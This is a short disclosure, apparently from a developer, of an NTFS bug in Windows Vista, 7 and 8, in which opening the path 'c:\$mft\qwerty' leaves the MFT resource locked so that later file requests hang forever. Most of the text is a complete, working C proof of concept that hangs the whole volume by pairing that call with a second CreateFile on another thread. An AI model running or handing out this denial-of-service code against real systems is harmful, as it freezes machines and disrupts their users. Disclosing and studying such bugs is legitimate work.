If you specify "\$mft\qwerty" to volume which is a target of create request, you'll hang a whole volume. NTFS doesn't release MFT FCB RESOURCE, therefore it makes all requests pending forever. The problem was discovered while developing file system filter driver.
Code example. Works on Windows Vista, 7, 8
#include "stdafx.h"
#include "windows.h"
DWORD WINAPI CreateFileThread( LPVOID lpThreadParameter ) {
// calling ntfs file system to cause MFT ERESOURCE to be locked exclusively,
// will hang forever, because previous calling ntfs from another thread didn't
// release ERESOURCE, therefore all further calling will wait for ERESOURCE
// releasing
CreateFile(
TEXT("c:\\any_non_existing_name_of_file"),
0,
0,
NULL,
CREATE_ALWAYS,
0,
NULL
);
return 0;
}
int _tmain(int argc, _TCHAR* argv[]) {
// calling ntfs file system to cause MFT ERESOURCE to be locked shared
CreateFile(
TEXT("c:\\$mft\\qwerty"),
0,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL,
OPEN_EXISTING,
0,
NULL
);
// creating thread to call ntfs to hang a volume completely
CreateThread(
NULL,
0,
CreateFileThread,
NULL,
0,
NULL
);
return 0;
}